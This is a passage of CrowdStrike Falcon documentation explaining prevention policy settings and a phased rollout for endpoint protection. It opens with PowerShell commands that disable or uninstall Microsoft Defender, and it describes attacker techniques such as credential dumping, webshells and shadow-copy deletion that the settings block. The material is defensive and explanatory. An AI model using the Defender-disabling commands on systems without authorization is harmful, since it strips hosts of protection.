Server 2008 R2, 2012, 2012 R2: Defender is disabled (or not even installed) by default. If you previously installed or enabled it manually, then you must disable it manually after enabling Falcon NGAV.
Server 2016, 2019, and 2022: Defender is enabled by default. If you left it enabled in your configuration, then it must be disabled after enabling the Quarantine & Security Center Registration switch.
The following Powershell cmdlet can be used to disable Defender:
- Set-MpPreference –DisableRealtimeMonitoring $true
The following Powershell cmdlet can be used to uninstall Defender:
- Uninstall-WindowsFeature -Name Windows-Defender

Defender doesn't have to be registered with the WSC (Workstations) and/or left enabled (Server 2016, 2019, 2022) to run On Demand Scans (ODS). Defender ODS can for example be run using GPO.

Preventions which can leverage the Quarantine function include:

Cloud and/or Sensor Machine Learning, file-based preventions - those where the Technique is either Cloud Based ML, Sensor Based ML, Adware, Adware/PUP, or PUP
Sensor Machine Learning, file-based preventions - those with Technique=Sensor Based ML
Custom Blocking-based preventions (Blocklisting though IOC Management) – those with Tactic of Custom Intelligence and Technique of Indicator of Compromise

Quarantine

Requirements:

Subscription: Falcon Prevent or Next-Gen Antivirus available with Falcon Insight XDR
Supported platforms: Mac and Linux

Note: This setting doesn't generate detections or preventions.

Turn on this setting to quarantine executable files after they are prevented by NGAV. We recommend setting Cloud-Based Anti-Malware - Prevention levels to Moderate when Quarantine is enabled.

Quarantine on Removable Media

Requirements:

Subscription: Falcon Prevent
Supported platform: Windows

Quarantine files on removable media after they're prevented by Next-Gen Antivirus (NGAV). Toggles that set quarantine behavior are located in the Anti-malware Prevention levels section in Sensor Machine Learning and Cloud Machine Learning.

Note: Quarantine & Security Center Registration is required to enable quarantine on detect on execute and detect on write for USB-based files.

On-Demand Scans category

The On-Demand Scans category includes prevention policy settings for on-demand scans. These settings control behavior for scans that are initiated by end users on the local host and for scans that are triggered by USB device insertion on the local host.

For info about configuring scan-specific settings, see On-Demand Scanning.

On-Demand Scans Machine Learning

Falcon machine learning (ML) analyzes files for on-demand scanning in the same way that it analyzes files upon execution. However, for on-demand scanning, the analysis is done on demand instead of upon execution.

Falcon on-demand scanning leverages both Cloud Anti-malware and Sensor Anti-malware, providing both online and offline detection.

These settings control ML behavior for on-demand scans that are initiated by end users. These settings also determine whether quarantine is enabled for scans that are initiated by end users.

Requirements:

Subscription: Falcon Prevent
Supported platform: Windows

Sensor-based anti-malware on-demand scanning

For offline and online hosts that are running on-demand scans that were initiated by end users, apply sensor-based ML to identify and analyze unknown executables to detect and prevent malware. To disable file quarantining, set the Prevention slider to Disabled.

Cloud-based anti-malware on-demand scanning

For online hosts that are running on-demand scans that were initiated by end users, apply cloud-based ML that leverages global analysis of executables to detect and prevent malware. To disable file quarantining, set the Prevention slider to Disabled.

Cloud-based adware & PUP on-demand scanning

For online hosts that are running on-demand scans that were initiated by end users, apply cloud-based machine learning that leverages global analysis of executables to detect and prevent adware and potentially unwanted programs (PUP). To disable file quarantining, set the Prevention slider to Disabled.

On-Demand Scans

Requirements:

Subscription: Falcon Prevent
Supported platform: Windows

USB Insertion Triggered Scan

Automatically start a scan when an end user inserts a USB device. To adjust detection sensitivity, change detection levels in On-Demand Scans Machine Learning.

Execution Blocking category

The Execution Blocking prevention category contains Custom Blocking, Suspicious Processes, Suspicious PowerShell Scripts and Commands, Suspicious Registry Operations, Drift Prevention, and Intelligence-Sourced Threats, which complement Machine Learning preventions.

Custom Indicator Blocking

Requirements:

Subscription: Falcon Prevent or Falcon Insight XDR
Supported platforms: Windows, Mac, and Linux

Custom Indicator Blocking enables blocklisting by hash, using hashes you add to IOC Management with the action set to Block. This allows an organization to use prevention policies to define and maintain a hash-based blocklist of executables deemed undesirable or harmful. Blocking by hash will take precedence over other policies.

To avoid inadvertently blocking trusted processes or processes fundamental to running the OS when using Custom Indicator Blocking, sensors don't block certain processes that have been signed by Microsoft. For more information see Custom IOCs.

Your custom blocklist applies to your entire CID. You can enable or disable custom blocklists in separate policies, but all your policies share the same blocklist.

Suspicious Process Prevention

Requirements:

Subscription: Falcon Prevent
Supported platforms: Windows, Mac, and Linux

This setting blocks processes which exhibit suspicious behavior as defined by IOAs. The goal is to identify the intention of the process, and block if deemed malicious. For example, svchost.exe being launched by an unexpected process, instead of services.exe, which is likely an indicator of malware execution.

This provides an additional level of protection in high-fidelity areas, such as PowerShell activity. As we continue to identify malicious activity that is impacting customers, we continuously update this prevention.

This setting is a core Behavioral IOA prevention setting, critical to preventing numerous threats including emerging and zero-day ones related to malware, ransomware, and credential theft.

Suspicious Script and Command Prevention

Requirements:

Subscription: Falcon Prevent
Supported platform: Windows

Important: For ARM64-based hosts running Windows 11, you must have Falcon sensor for Windows version 6.56 or later. This setting is not supported for ARM64-based hosts running Windows 10.

The Falcon sensor can block some malicious operations performed by scripts and shells, such as:

Contents of executed script files
Typed strings on a PowerShell prompt
Dynamically executed strings through the Invoke-Expression cmdlet
Commands supplied as a command-line parameter, such as -EncodedCommand

Important: On Windows 10, Windows 11, Server 2016, Server 2019, and Server 2022-based hosts, this setting also enables the prevention of malicious VBA macros in Microsoft Office products as well as malicious VBScript, JScript, and Excel 4.0 macros if Script-Based Execution Monitoring has also been enabled.

When related malicious content is prevented, PowerShell displays an error message on that particular command or script. The host process powershell.exe is not terminated and no pop-ups are displayed.

When related malicious content is prevented, Office displays an error message on that particular VBA macro. The host Office process is terminated and Office displays a pop-up.

This setting is critical to prevent script-based and PowerShell-based threats.

It's extremely common for adversaries to leverage Powershell to move laterally through organizations once they gain initial entry. It’s also extremely common for malicious adversaries to leverage content and scripts downloaded and triggered by Office documents.

Important: This setting requires that either Interpreter-Only Visibility and/or Script-Based Execution Visibility be enabled as a prerequisite.

Suspicious Registry Operation Prevention

Requirements:

Subscription: Falcon Prevent
Supported platform: Windows

This setting blocks processes that exhibit suspicious registry-related behavior as defined by dynamic IOAs. It focuses on Autostart Extension Points (ASEPs) and security config changes.

When Suspicious Registry Operation Prevention is enabled, detections resulting in blocked registry operations will show Registry operation blocked in the Actions Taken section of a detection. As we continue to identify malicious activity that is impacting customers, we continuously update this prevention.

This setting is critical to preventing threats including emerging and zero-day ones related to persistence created by malware so it can load on system restart, as well as the disabling or enabling of services which can make a system vulnerable to attacks.

Container Drift Prevention

Requirements:

One of the following subscriptions:
- Falcon Cloud Security with Containers CNAPP
- Falcon Cloud Security with Containers Runtime Protection
- Falcon for Managed Containers Runtime Protection
- Falcon Cloud Security for Containers
Supported platform: Linux

Important: Make sure you have read the three-phase prevention policy settings for drift prevention before enabling this feature. For more info, see Three-phase prevention policy settings.

Container Drift Prevention protects containers from drift events. When this policy is enabled, if the RecentlyModifiedFileExecutedInContainer event is detected on a container, both the process that triggers the event and its parent process are terminated. This ensures that if the parent process is malicious or exploited, then the impact of the malicious activity is contained. This allows the runtime workload to continue without having to terminate the container to block the drift process. However, if the parent process is the container runtime, the container will automatically be stopped.

When following our recommendations for phase 2 in Three-phase prevention policy settings, you will have both binary and script based drift detection enabled. Use Drift Indicators in the Falcon console to monitor your containers for drift events and, if necessary, create exclusions for processes with expected drift prior to turning on drift detection. Go to Cloud security > Detections > Containers , then click Drift indicators. For more info, see Review detected and prevented container drift events and Enable drift prevention.

Only enable the prevention policy only after you’ve created any required exclusions and you want to block all other drift processes. When enabled, drift is prevented on all containers running on the host. You might want to allow some drift processes to occur in certain environments, for example, on test servers or build environments. If exclusions don’t make sense for these situations, we recommend adding these to their own host group that does not have container drift prevention enabled. For more info, see Create exclusions to allow expected container drift.

Note: Processes that are terminated as a result of Container Drift Prevention might be shown as Expired Process in the Event Investigation process tree. This only occurs if the event is detected by the Falcon Container sensor for Linux.

Intelligence-Sourced Threat Prevention

Requirements:

Subscription: Falcon Prevent
Supported platforms: Windows and Mac

When this setting is enabled, the Falcon sensor blocks high-severity detected processes that have been classified as malicious by CrowdStrike's Intelligence analysts - these are focused on high-confidence, static hash-based IOCs. Known malicious portable executable files can be any type of malware including ransomware, loaders, and keyloggers.

Driver Load Prevention

Requirements:

Subscription: Falcon Prevent
Supported operating systems: Windows 10 and Windows Server 2016 and later.

This setting enables the driver prevention feature and blocks the loading of known malicious kernel mode drivers identified by CrowdStrike analysts. Drivers are blocked by hash. This includes drivers that don't violate any of the rules of HVCI or System Guard. This setting works with or without those mitigations and doesn’t interfere with or interrupt them in any way.

Vulnerable Driver Protection

Requirements:

Subscription: Falcon Prevent

Supported operating systems:

Windows 10 and later.
Windows Server 2016 and later.

Important: Enabling the Driver Load Prevention setting, previously called Suspicious Kernel Drivers, is required to use this setting.

When enabled, the sensor will quarantine and block the loading of newly written vulnerable drivers. These drivers are identified by CrowdStrike analysts as containing security vulnerabilities and can be used in Bring Your Own Vulnerable Driver (BYOVD) attack scenarios. When enabled, this feature provides a layer of protection against attacks that use Bring Your Own Vulnerable Driver (BYOVD) techniques.

When you enable Vulnerable Driver Protection on your prevention policy, the following takes place:

PE files newly written to storage are monitored and telemetry is generated through the PeFileWritten event.
The data in the PeFileWritten events are compared to a dynamic list of vulnerable drivers identified by CrowdStrike’s analysts.
If CrowdStrike has identified a driver as vulnerable, the driver may be quarantined and/or blocked from loading.
Appropriate detections are generated.

Note: Vulnerable Driver Protection doesn’t evaluate existing drivers that are already installed.

File System Containment

Requirements:

Subscription: Falcon Prevent
Supported operating systems: Windows 10 version 1809 and later, Windows Server 2016 and later
Sensor support: Falcon sensor for Windows version 7.21 and later
Default roles: Falcon Administrator
CrowdStrike clouds: Available in all clouds

File system containment enables the sensor to quickly respond to malicious remote file system activity detected on a host, such as ransomware attacks over the Server Message Block (SMB) protocol.

How file system containment works

When File system containment is enabled and the sensor detects malicious remote file system activity occurring on the host, the following actions take place:

The sensor contains the identified remote user account on the host, preventing any further destructive remote file system activity from the identified remote user account.
The remote user account remains contained until File system containment is lifted in Host Management or Endpoint detections.

For more info about File system containment, see File System Containment.

Boot Configuration Database Protection

Requirements:

Subscription: Falcon Prevent
Supported platform: Windows
Sensor support: Falcon sensor for Window 7.25 and later
Prevention Policies: The Suspicious registry operation prevention setting must be enabled as a prerequisite to enable the Boot configuration database protection setting.
- For sensor versions 7.24 and earlier: Falcon sensor for Windows performs Operational Block (OP BLOCK) actions for Windows Boot Configuration Database Store (BCD) related detections if you enable this setting:
  - Suspicious registry operation prevention
- For sensor versions 7.25 and later: To activate Operational Block (OP BLOCK) actions, enable both of these settings:
  - Suspicious registry operation prevention
  - Boot configuration database protection
- If only Suspicious registry operation prevention is enable, these detections default to Detect Only.
Default roles: Falcon Administrator
CrowdStrike clouds: Available in all clouds

When enabled, the Boot configuration database protection prevention policy setting prevents adversaries from maliciously modifying critical Windows boot settings in the BCD registry hive. If you don't enable this setting, adversaries can make modifications and then perform the following actions:

Disable Driver Signature Enforcement (DSE)
Force endpoints into Safe Mode
Disable Early Launch Anti-malware (ELAM) protection
Create potential evasion or persistence mechanisms

Note: When disabled, detections related to suspicious and malicious modification of the Windows BCD registry hive still occur, but no preventative action is taken.

This setting protects against suspicious and malicious changes to the Windows BCD registry hive based on analysis of known adversary behavior and intrusions, but it is not intended to block all changes to the Windows BCD registry hive. CrowdStrike detection engineers continuously monitor the threat landscape and enhance detection coverage through dynamic content updates.

Exploit Mitigation category

Exploit Mitigation stops attempts to exploit vulnerabilities and prevents hosts from being compromised.

When enabled, prevention is only applied to new processes that start after the feature has been enabled. Any applications that were already running are still unprotected until the next restart.

When turned off, the prevention is no longer applied to new processes, but still exists for any processes that were already running with protection enabled. However, when one of those processes exits and restarts, it starts without exploit mitigation protection.

For Force ASLR, Force DEP, and Heap Spray Preallocation

By definition, none of these three exploit mitigation preventions can be a false positive in the classic sense, because the detection condition absolutely occurred. There’s no interim state, it’s on or it’s off. However, there are some otherwise legitimate products, such as Java or MS Office pre-2010, with known code defects which can generate exploit mitigation preventions in the absence of truly malicious action.

The upside of the above is that Falcon can detect these conditions and kill the process chain quickly. The downside is that as a side-effect of killing the process chain so early, there’s less detection data available than there is for most preventions. That can determine if any individual prevention was malicious or just a result of poor code.

We recommend ASLR and Heap-Spray be enabled because while it’s possible for ASLR and Heap-Spray preventions to result from code defects, unless you’re running very old versions of Office and so on. the odds are far higher it’s legitimately malicious, and these techniques are regularly used by adversaries. Both ASLR and Heap Sprays are used in Memory corruption attacks against memory vulnerabilities in software. Common attacks prevented by these are stack overflows, attacks on browsers which don't adhere to ASLR, and ASLR bypass using Return-oriented Programming (ROP) gadgets.

We don't recommend enabling Force DEP because the opposite is generally true, they frequently still result from code defects. If you want to enable Force DEP, test it extensively before enabling it in production.

ASLR Bypass Prevention

Requirements:

Subscription: Falcon Prevent
Supported platform: Windows

Important: This setting requires Additional User Mode Data. For more info, see Additional User Mode Data Visibility.

Important: This setting is inoperative on Windows ARM64-based hosts.

When enabled, Address Space Layout Randomization bypass attempts will be detected and blocked. Almost every DLL is designed to be relocatable and to function normally when placed in a memory location other than its default address. Falcon doesn't relocate any DLL that is not relocatable or any DLL that Windows or another security tool has already relocated from its default. Additionally, Falcon doesn't apply these prevention policies to applications that don't handle ASLR safely.

DEP Bypass Prevention

Requirements:

Subscription: Falcon Prevent
Supported platform: Windows

Important: This setting requires Additional User Mode Data Visibility. For more info, see Additional User Mode Data Visibility.

Important: This setting is inoperative on Windows ARM64-based hosts.

Force DEP Prevention prevents a process that had Force Data Execution Prevention applied from executing non-executable memory. If you want to enable the Force DEP policy option, we strongly recommend significant testing prior to making that change on production systems in order to avoid potentially blocking legitimate applications.

Heap Spray Pre-allocation Prevention

Requirements:

Subscription: Falcon Prevent
Supported platform: Windows

Important: This setting requires Additional User Mode Data. For more info, see Additional User Mode Data Visibility.

Important: This setting is inoperative on Windows ARM64-based hosts.

When enabled, Heap Spray Pre-allocation attempts are detected and blocked. This is a popular technique for remotely hijacking browsers. Heap Sprays fragment memory, so a known failure would be software that tries to allocate a large block of contiguous memory, as for example Java occasionally does.

NULL Page Allocation Prevention

Requirements:

Subscription: Falcon Prevent
Supported platform: Windows

Important: This setting requires Additional User Mode Data Visibility.

Important: This setting is inoperative on Windows ARM64-based hosts.

NULL Page Allocation Prevention prevents the exploitation of Null Pointer dereferencing, which can be exploited when the stack pointer address is set to NULL. If the exploit also has control over adjacent memory, this could lead to remote code execution. This is a popular mechanism used by adversaries for executing remote code.

SEH Overwrite Prevention

Requirements:

Subscription: Falcon Prevent
Supported platform: Windows

Important: This setting requires Additional User Mode Data Visibility.

Important: This setting is inoperative on Windows ARM64-based hosts.

The Structured Exception Handler (SEH) maintains a chain of pointers to each exception handler. By overwriting these pointers with the address of malicious code, the SEH Overwrite technique can control execution, bypassing common mitigations including ASLR and DEP. This option detects and prevents exploits that attempt to gain execution by overwriting an SEH. This is a popular mechanism used by adversaries for executing remote code.

Unauthorized Remote Access IOAs category

Chopper Webshell Prevention

Requirements:

Subscription: Falcon Prevent
Supported platform: Mac

Chopper Webshell attacks occur when an attacker controls the content of a web page that’s served by an organization’s web server. This malicious web page is used to provide a remote shell from a victim server to a Chopper client that’s running on a remote attacker machine. Preventing the creation of Chopper Webshell code prohibits further exploitation activity such as persistence, lateral movement, and credential theft.

XPCOM Shell Prevention

Requirements:

Subscription: Falcon Prevent
Supported platform: Mac

This option prevents the execution of an XPCOM (JavaScript) shell, which is often used to make a network connection when accessing vulnerabilities within Firefox.

When enabled, it detects and blocks any command webshell.

Empyre Backdoor Prevention

Requirements:

Subscription: Falcon Prevent
Supported platform: Mac

This option terminates a process with behaviors indicative of the Empyre Backdoor, which provides remote access to hosts. Empyre is a Post Exploitation framework built using Python.

Credential Dumping IOAs category

KcPassword Decoded Prevention

Requirements:

Subscription: Falcon Prevent
Supported platform: Mac

This setting prevents an attempt to recover a plaintext password using the kcpassword file – kcpassword is a script-based macOS autologin enabler.

Hash Collector Prevention

Requirements:

Subscription: Falcon Prevent
Supported platform: Mac

This setting prevents an attempt to dump a user’s hashed password.

Ransomware category

Backup Deletion Prevention

Requirements:

Subscription: Falcon Prevent
Supported platform: Windows

When enabled, this detects and blocks processes that attempt to delete all volume shadow copies, that being a very popular, key tactic used by some ransomware variants.

Important: This option doesn't apply to known good allowlisted processes.

Cryptowall Prevention

Requirements:

Subscription: Falcon Prevent
Supported platform: Windows

When enabled, this setting blocks most known variants of Cryptowall.

File Encryption Prevention

Requirements:

Subscription: Falcon Prevent
Supported platform: Windows

When enabled, File Encryption Prevention detects and blocks a process that traverses a directory and starts encrypting individual files on disk using known extensions. It is possible that one file may be encrypted prior to process termination.

Locky Prevention

Requirements:

Subscription: Falcon Prevent
Supported platform: Windows

When enabled, it detects and blocks most known variants of Locky ransomware.

File System Access Prevention

Requirements:

Subscription: Falcon Prevent
Supported platform: Windows

When enabled, File System Access Prevention prevention stops processes that are performing a high volume of file system operations, which is a behavior pattern common in ransomware. Detects and blocks generic ransomware variants.

Volume Shadow Copy - Audit

Requirements:

Subscription: Falcon Prevent
Supported platform: Windows

Deletion of shadow copies is a common pre-encryption phase in ransomware attacks, performed to make recovery more difficult and therefore increase the pressure on the victim to pay the ransom. Turning on Volume Shadow Copy - Audit is the first step toward enabling the Volume Shadow Copy - Protect feature. When Volume Shadow Copy - Audit is turned on, Falcon identifies software that would be prevented from manipulating volume shadow copies if the setting were in protection mode.

Many legitimate backup software applications make use of Windows volume shadow copies, so it’s important to review the list of detections in audit mode and allowlist all legitimate applications before turning on protection mode. For more info, see Exclusions.

Volume Shadow Copy - Protect

Requirements:

Subscription: Falcon Prevent
Supported platform: Windows

Important: You must enable Volume Shadow Copy - Audit before enabling Volume Shadow Copy - Protect.

When enabled, Volume Shadow Copy - Protect prevents any process which attempts to delete any volume shadow copies which were not explicitly allowlisted by the customer. This protects Windows volume shadow copies from deletion by unauthorized software.

Before enabling Volume Shadow Copy - Protect, enable Volume Shadow Copy - Audit to identify legitimate software applications, including backup software, that should be allowed to manipulate volume shadow copies when the feature is in protection mode, and then add them to your allowlist.

Legitimate applications detected through Volume Shadow Copy - Audit must be allowlisted using IOA exclusion prior to enabling Volume Shadow Copy - Protect. For more info, see Exclusions.

Exploitation Behavior category

Exploitation Behavior Prevention IOAs involve blocking activities that occur immediately after the initial exploitation of an application.

Application Exploitation Prevention

Requirements:

Subscription: Falcon Prevent
Supported platform: Windows

When enabled, the creation of a process, such as a command prompt (cmd.exe), from an exploited browser or browser flash plugin is blocked.

Chopper Webshell Prevention

Requirements:

Subscription: Falcon Prevent
Supported platform: Windows

Chopper webshell attacks occur when an attacker controls the content of a web page that’s served by an organization’s web server. This malicious web page is used to provide a remote shell from a victim server to a Chopper client that’s running on a remote attacker machine.

Preventing the creation of Chopper WebShell code prohibits further exploitation activity such as persistence, lateral movement, and credential theft.

Drive-by Download Prevention

Requirements:

Subscription: Falcon Prevent
Supported platform: Windows

When enabled, it detects and blocks files written by the browser to a temp location and executed. This attempts to terminate both the new process and the parent browser.

Code Injection Prevention

Requirements:

Subscription: Falcon Prevent
Supported platform: Windows

Important: Requires Additional User Mode Data.

When enabled, it kills processes attempting PowerShell injection into other processes, such as Task Manager or Firefox, which adversaries will do to evade detection.

JavaScript Execution Via Rundll32 Prevention

Requirements:

Subscription: Falcon Prevent
Supported platform: Windows

When enabled, JavaScript executing from a command line through rundll32.exe is prevented. This is a popular method used to bypass Microsoft AppLocker or other software restriction policies by using an allowed application to execute malicious code.

Lateral Movement and Credential Access category

This category covers the prevention of activity that is used to escalate logon privileges, such as the usage of Windows Logon Bypass to open a command prompt.

Windows Logon Bypass ("Sticky Keys") Prevention

Requirements:

Subscription: Falcon Prevent
Supported platform: Windows

This category covers the prevention of post-exploit activity that is used to escalate logon privileges, such as the usage of Windows Logon Bypass (aka "Sticky Keys") to open a command prompt without having to logon.

When enabled, it detects and blocks a process that attempts to alter the registry entry modifying the execution of the on-screen keyboard (osk.exe) to launch another process like cmd.exe. Doing so would permit the new process to run with system privileges without authentication. Windows Logon Bypass-based attacks are used to obtain persistence. Linking the windows logon to command prompts or batch processes can result in false positives with this setting because those are high-risk security practices which everyone should avoid. We recommend leaving this option enabled and adjusting your logon practices. If that’s not possible, the second-best option is to move systems, such as kiosks, that you want to run such processes into a separate policy group from those that you don't need to run such processes.

Credential Dumping Prevention

Requirements:

Subscription: Falcon Prevent
Supported platform: Windows

Important: Requires Additional User Mode Data Visibility. For more info, see Additional User Mode Data Visibility.

This setting detects and prevents suspicious processes that are stealing logins and passwords, such as Mimikatz, that allow an adversary with elevated permissions to read credentials out of the LSASS process. LSASS-based credential dumping is a popular tactic to acquire and maintain host/environment access by adversaries.

Remediation category

Advanced Remediation

Requirements:

Subscription: Falcon Prevent
Supported platform: Windows

When you enable the Advanced Remediation setting, Falcon kills processes, quarantines files, and deletes ASEP registry values, scheduled tasks, and services for certain IOA detections. When enabled, this setting quarantines files as part of remediations even if the Quarantine Files setting is disabled. The remediation actions Falcon performs depend on the detection, and Falcon doesn’t perform remediation on all detections. Because remediations occur post-detection, a quarantine race condition with a Traditional AV is extremely unlikely.

Note: CrowdStrike performs safety checks for critical processes, critical file paths, and critical PIDs as it performs remediation to ensure that the actions taken don’t interfere with current system processes, boot-up, or login sequences.

Kill processes: Falcon kills the triggering process, its parent, and/or its grandparent process.
Quarantine files: Files quarantined can include executable files, dynamic-link libraries (DLLs) and other non-process executable file types written by a process, such as config text files. Falcon can quarantine files that were used to create or write the triggering process, its parent, and/or its grandparent process.
Remove ASEPs: Delete registry values related to ASEP registry-based entries such as run keys. Falcon can remove registry values, scheduled tasks, or services created by the triggering process, its parent, and/or its grandparent process.

Advanced Remediation isn’t retroactive. If the Advanced Remediation policy setting is disabled at the time of a detection, Falcon won't retroactively perform remediation after the setting is turned on.

Falcon doesn’t provide a setting to undo the removal of ASEP registry values, scheduled tasks, or services. To restore removed persistence entries, release the associated quarantined binary and then rerun the binary. Consider whether the triggering detection needs to be added to your allowlist. See Exclusions for more information about managing your allowlist.

Falcon doesn’t report error conditions for failed remediation actions. Files quarantined through remediation are only supported if they are hosted on storage the host OS views as local. Files hosted on remote drives aren’t quarantined.

Cloud-based detections category

The Cloud-based detections category includes settings that control which detection events are generated when CrowdStrike cloud identifies potentially malicious behavior patterns, such as suspicious command chains and unusual execution patterns.

Cloud-based anomalous process execution

Requirements:

Subscription: Falcon Insight XDR or Falcon Prevent
Supported platform: Windows

The Cloud-based anomalous process execution prevention policy setting uses AI-powered Indicators of Attack (IOAs) to identify suspicious behaviors associated with legitimate LOLBins that attackers commonly use for malicious purposes.

Cloud-based anomalous process execution is disabled by default. When you enable it, the system monitors and identifies potentially malicious activities involving LOLBins on your Windows hosts. You can use the policy slider setting to control detection sensitivity. Higher settings provide more detections but might increase false positives. Moderate is the recommended setting. We don't recommend using the Aggressive or Extra-Aggressive settings outside of penetration and stress testing scenarios.

Detection events are generated with comprehensive process ancestry information, such as child, parent, and grandparent processes. This gives security teams complete context about potential threats. This information might be used to create IOA exclusions to see fewer false positives. For more info about applying exclusions, see IOA exclusions.

Three-phase prevention policy settings

Falcon Prevent and Falcon Insight XDR include 3 pre-configured prevention policies that you can deploy in phases:

Phase 1 - initial deployment
Phase 2 - interim protection
Phase 3 - optimal protection

This multi-phase approach offers a structured path from initial deployment to full realization of our best practices. If you're running pre-existing antivirus or HIPS suites, start with phase 1 to reduce possible conflicts. If you aren't running antivirus or HIPS suites, start with phase 2. Leverage change control procedures to advance hosts to the next phase, adjusting exclusions, IOC management, and custom IOA rules to refine the configuration and reduce false positives.

Typically, it should take no more than 45 days to complete full sensor deployment to all eligible endpoints and move into phase 2 settings. It should take no more than 90 days after deployment to apply phase 3 settings to all hosts.

Tip: During deployment, keep in mind that host group assignment affects what policy applies to a host. For unassigned hosts and hosts groups without prevention policies, the default policy applies. If a host is assigned to multiple host groups, the policy that applies depends on policy precedence. For more info, see Policy precedence and default policies.

Phase 1: Initial deployment

If your environment has pre-existing antivirus or HIPS suites, start with this phase for rapid deployment. Assign host groups and then run phase 1 for the minimum time required to allow most of your applications to execute while you triage detections and address any false positives as appropriate, typically no more than 45 days. What this policy offers:

Sets the machine learning (ML) settings to detect-only so you can safely triage detections. Many of the IOA-based settings are disabled here but still generate detections, allowing you to triage detections for those settings as well.
Enables a few behavior-based protections for ransomware and IOAs that are low probability for false positives. This provides some immediate protection against dangerous exploits as you prepare to move to optimal protection in Phase 3.

Note: To test in-depth Falcon protection capabilities before full deployment, assign your test hosts to Phase 3.

Phase 2: Interim protection

These interim policy settings offer solid protection, so we recommend disabling or uninstalling other third-party AV products now. Assign host groups and then run phase 2 for the minimum time required to allow most of your applications to execute while you continue to triage detections and address any false positives as appropriate, typically no more than 45 days. What this policy offers:

Sets ML detections to Aggressive and ML preventions to Moderate.
Enables additional IOA-based prevention settings.

Note: To test in-depth Falcon protection capabilities before full deployment, assign your test hosts to Phase 3.

Phase 3: Optimal protection

This phase includes the recommended protection settings and is your ultimate prevention policy goal. Ideally you have used the other phases to refine exclusions, IOC management, and custom IOA rules, as well as assigning a representative set of non-production systems to this policy. What this policy offers:

Sets ML preventions to Aggressive.
Enables the remaining recommended IOA-based prevention policy settings.
Enables container drift prevention.

Windows prevention policy setting recommendations - three-phase view

Type	Category	Setting	Phase 1 - For rapid deployment with pre-existing AV	Phase 2 - Interim protection level	Phase 3 - Optimal protection
Sensor Capabilities	-	End User Notifications	Customer preference	Customer preference	Customer preference
Sensor Capabilities	-	Unknown Executable Analysis and Unknown Detection-Related Executable Analysis	On	On	On
Sensor Capabilities	-	Sensor Tamper Prevention	On	On	On
Sensor Capabilities	-	Suspicious File QuickScan Pro Analysis	Customer preference	Customer preference	Customer preference
Sensor Visibility	Enhanced Visibility	Additional User Mode Data Visibility	On	On	On
Sensor Visibility	Enhanced Visibility	Interpreter-Only Visibility	On	On	On
Sensor Visibility	Enhanced Visibility	System Management Engine Visibility	On	On	On
Sensor Visibility	Enhanced Visibility	Script-Based Execution Visibility	Off	On	On
Sensor Visibility	Enhanced Visibility	HTTP Visibility and Detection	On	On	On
Sensor Visibility	Enhanced Visibility	Redacted HTTP Detection Details	Customer preference	Customer preference	Customer preference
Sensor Visibility	Enhanced Visibility	Hardware-Enhanced Exploit Detection	On	On	On
Sensor Visibility	Enhanced Visibility	Enhanced Exploitation Visibility	On	On	On
Sensor Visibility	Enhanced Visibility	Extended User Mode Data Visibility	Disabled	Cautious	Moderate
Sensor Visibility	Enhanced Visibility	Enhanced DLL Load Visibility	On	On	On
Sensor Visibility	Enhanced Visibility	WSL 2 Visibility	On	On	On
Sensory Visibility	Hardware-Enhanced Visibility	Memory Scanning with GPU	On	On	On
Sensory Visibility	Hardware-Enhanced Visibility	Memory Scanning with CPU	Off	On	On
Sensor Visibility	Firmware	BIOS Firmware Deep Visibility	Off	Off	On
Next-Gen Antivirus	Cloud Machine Learning	Cloud-Based Anti-Malware - Detection	Moderate	Aggressive	Aggressive
Next-Gen Antivirus	Cloud Machine Learning	Cloud-Based Anti-Malware - Prevention	Disabled	Moderate	Moderate+
Next-Gen Antivirus	Cloud Machine Learning	Cloud-Based Adware & Pup - Detection	Moderate	Aggressive	Aggressive
Next-Gen Antivirus	Microsoft Office File Macro Machine Learning	Cloud Anti-malware for Microsoft Office Files- Detection	Moderate	Aggressive	Aggressive
Next-Gen Antivirus	Microsoft Office File Macro Machine Learning	-Cloud Anti-malware for Microsoft Office Files Prevention	Disabled	Moderate	Moderate+
Next-Gen Antivirus	Clean Infected Microsoft Office Files	Microsoft Office File Malicious Macro Removal	Off	Customer preference	Customer preference
Next-Gen Antivirus	Cloud Machine Learning	Cloud-Based Adware & Pup - Prevention	Disabled	Moderate	Moderate+
Next-Gen Antivirus	Sensor Machine Learning	Sensor-Based Anti-Malware - Detection	Moderate	Aggressive	Aggressive
Next-Gen Antivirus	Sensor Machine Learning	Sensor-Based Anti-Malware - Prevention	Disabled	Moderate*	Moderate+
Next-Gen Antivirus	Sensor Machine Learning	Enhanced machine learning for larger files	Off	On	On
Next-Gen Antivirus	On-Demand Scans Machine Learning	Cloud-based anti-malware on-demand scanning - Detection	Moderate	Aggressive	Aggressive
Next-Gen Antivirus	On-Demand Scans Machine Learning	Cloud-based anti-malware on-demand scanning - Prevention	Disabled	Moderate	Moderate+
Next-Gen Antivirus	On-Demand Scans Machine Learning	Sensor-based anti-malware on-demand scanning - Detection	Moderate	Aggressive	Aggressive
Next-Gen Antivirus	On-Demand Scans Machine Learning	Sensor-based anti-malware on-demand scanning - Prevention	Disabled	Moderate	Moderate+
Next-Gen Antivirus	On-Demand Scans Machine Learning	Cloud-based adware & PUP on-demand scanning - Detection	Moderate	Aggressive	Aggressive
Next-Gen Antivirus	On-Demand Scans Machine Learning	Cloud-based adware & PUP on-demand scanning - Prevention	Disabled	Moderate	Moderate+
Next-Gen Antivirus	On-Demand Scans	USB Insertion Triggered Scan	On	On	On
Next-Gen Antivirus	On Write	Detect on Write	On	On	On
Next-Gen Antivirus	On Write	Quarantine on Write	Off	On	On
Next-Gen Antivirus	On Write	On Write Script File Visibility	On	On	On
Next-Gen Antivirus	Quarantine	Quarantine & Security Center Registration	Off	On*	On
Next-Gen Antivirus	Quarantine	Quarantine on Removable Media	Off	On	On
Malware Protection	Execution Blocking	Custom Indicator Blocking	On	On	On
Malware Protection	Execution Blocking	Suspicious Process Prevention	Off	On	On
Malware Protection	Execution Blocking	Suspicious Registry Operation Prevention	Off	On	On
Malware Protection	Execution Blocking	Suspicious Script and Command Prevention	Off	On	On
Malware Protection	Execution Blocking	Intelligence-Sourced Threat Prevention	On	On	On
Malware Protection	Execution Blocking	Driver Load Prevention	On	On	On
Malware Protection	Execution Blocking	Vulnerable Driver Protection	On	On	On
Malware Protection	Execution Blocking	Boot Configuration Database Protection	Off	On	On
Behavior-based Prevention	Execution Blocking	File System Containment	Off	On	On
Behavior-based Prevention	Exploit Mitigation	ASLR Bypass Prevention	Off	Off	On
